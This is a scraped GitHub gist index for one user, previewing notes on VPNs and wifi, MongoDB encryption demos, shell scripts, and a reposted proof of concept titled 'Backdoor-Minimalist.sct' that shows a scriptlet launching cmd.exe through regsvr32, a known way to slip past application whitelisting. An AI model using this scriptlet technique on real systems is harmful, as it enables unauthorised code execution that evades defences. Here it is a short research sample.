Skip to content

Instantly share code, notes, and snippets.

kennwhite

Block or report user

Report or block kennwhite

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@kennwhite
kennwhite / vpn_psk_bingo.md
Last active Oct 23, 2019
Most VPN Services are Terrible
View vpn_psk_bingo.md

Most VPN Services are Terrible

Short version: I strongly do not recommend using any of these providers. You are, of course, free to use whatever you like. My TL;DR advice: Roll your own and use Algo or Streisand. For messaging & voice, use Signal. For increased anonymity, use Tor for desktop (though recognize that doing so may actually put you at greater risk), and Onion Browser for mobile.

This mini-rant came on the heels of an interesting twitter discussion: https://twitter.com/kennwhite/status/591074055018582016

@kennwhite
kennwhite / wifi_network_signal_notes.md
Last active Oct 22, 2019
Notes on troubleshooting home wifi 2.4Ghz & 5Ghz Wi-Fi network signals
View wifi_network_signal_notes.md

Caveat: This worked for me, but might not for you. If you take any of my advice and something goes horribly wrong, you are entitled to a full refund of goose eggs.

TL;DR: For a 2-floor home, with a mix of 5+ year-old wifi devices, to reasonably new iOS, Macs, & set top boxes, and 22+ competing network signals, the best mix I found was:

Central 2nd floor wifi router, 5Ghz band set to a fixed (not auto) channel, 802.11a/n, with 40Mhz width produced optimal speed and reliability, delivering 78-145 Mbps down and ~25 Mbps up on a ~200Mbps connection. 2.4Ghz band set to 802.11b/g/n with 20Mhz width for old devices or extended range. The specific channels used should be entirely based on signal maps using the apps mentioned below. Sit where you and your friends/family sit (in bed, on the sofa, at the table, on the floor, wherever, and take several samples to find the least congested channels).

The 5Ghz setup was the best setting for every nearly device (Nest, Roku 3, iPad 3rd gen, iPod 5th gen, and iPhone 6

@kennwhite
kennwhite / hello_world_shell_kms.js
Last active Oct 16, 2019
MongoDB Client Side Field Level Encryption Quickstart Part 2 (KMS version)
View hello_world_shell_kms.js
// Simple demonstration using MongoDB Client-Side Field Level Encryption (KMS version)
// Requires Community or (preferrably) Enterprise Shell and a MongoDB 4.2+ database
// Local, stand-alone, or Atlas MongoDB will all work.
// To use this, just open Mongo shell, with this file, e.g.: `mongo localhost --shell hello_world_shell_kms.js`
// Note, you will need the attached `kms_config.env` file, see below.
// See: Client-Side Field Level Encryption Quickstart Part 1:
// https://gist.github.com/kennwhite/e64e5b6770e89a797c3a08ecaa0cb7d0
var demoDB = "demoFLE"
@kennwhite
kennwhite / hello_world_shell_local.js
Last active Oct 16, 2019
MongoDB Client Side Field Level Encryption Quickstart Part 2 (local key version)
View hello_world_shell_local.js
// Simple demonstration using MongoDB Client-Side Field Level Encryption (local key version)
// Requires Community or (preferrably) Enterprise Shell and a MongoDB 4.2+ database
// Local, stand-alone, or Atlas MongoDB will all work.
// To use this, just open Mongo shell, with this file, e.g.: mongo localhost --shell hello_world_shell_local.js
// Note, you will need the attached `localkey_config.env` file, see below.
// See: Client-Side Field Level Encryption Quickstart Part 1:
// https://gist.github.com/kennwhite/e64e5b6770e89a797c3a08ecaa0cb7d0
var demoDB = "demoFLE"
@kennwhite
kennwhite / 1944_OSS_Simple_Sabotage_Field_Manual.md
Last active Oct 8, 2019
1944 OSS Simple Sabotage Field Manual
View 1944_OSS_Simple_Sabotage_Field_Manual.md
@kennwhite
kennwhite / unprivileged_caddy.sh
Last active Oct 3, 2019
Run caddy server as unprivileged user, includes Hugo option
View unprivileged_caddy.sh
#!/bin/bash
# *As root*
cd ~
killall caddy
rm -rf ~/caddy
mkdir caddy && cd caddy
curl -SL 'https://caddyserver.com/download/build?os=linux&arch=amd64&features=hugo' > caddy.tgz
tar xzf caddy.tgz
@kennwhite
kennwhite / Backdoor-Minimalist.sct
Created Apr 21, 2016
Execute Remote Scripts Via regsvr32.exe
View Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
View .crostini-setup
These scripts set up Crostini on my Pixelbook
@kennwhite
kennwhite / reset_osx_attributes.sh
Created Sep 1, 2013
Remove all extended attributes recursively on an OSX directory & files and fix "chown: ... Operation not permitted" and "chmod: ... Operation not permitted"
View reset_osx_attributes.sh
# This is the nuclear option. Use with extreme care
# Works up to and including Mountain Lion (10.8.x)
# Show all extended attributes
ls -lOe ~/dir-to-fix
# Remove no-change attributes
sudo chflags nouchg ~/dir-to-fix
# Recursively clear all entended attributes
@kennwhite
kennwhite / hello_world_node.js
Last active Sep 14, 2019
Client Side Field Level Encryption Hello World for Node.js
View hello_world_node.js
// Simple Client-Side Field Level Encryption example for Node.js
// To install: mkdir proj; cp hello_fle_node.js proj; cd proj; npm install mongodb mongodb-client-encryption --save; node hello_fle_node.js
const dbName = 'demoFLE';
const keyCollection = dbName + '.__keystore'
const dataCollection = 'people'
const url = "mongodb+srv://username:password@xxx.example.net/" + dbName; // 'mongodb://localhost'
const AWS_ACCESS_KEY = "AKIxxxxxxxxxxxxxxxxx"
You can’t perform that action at this time.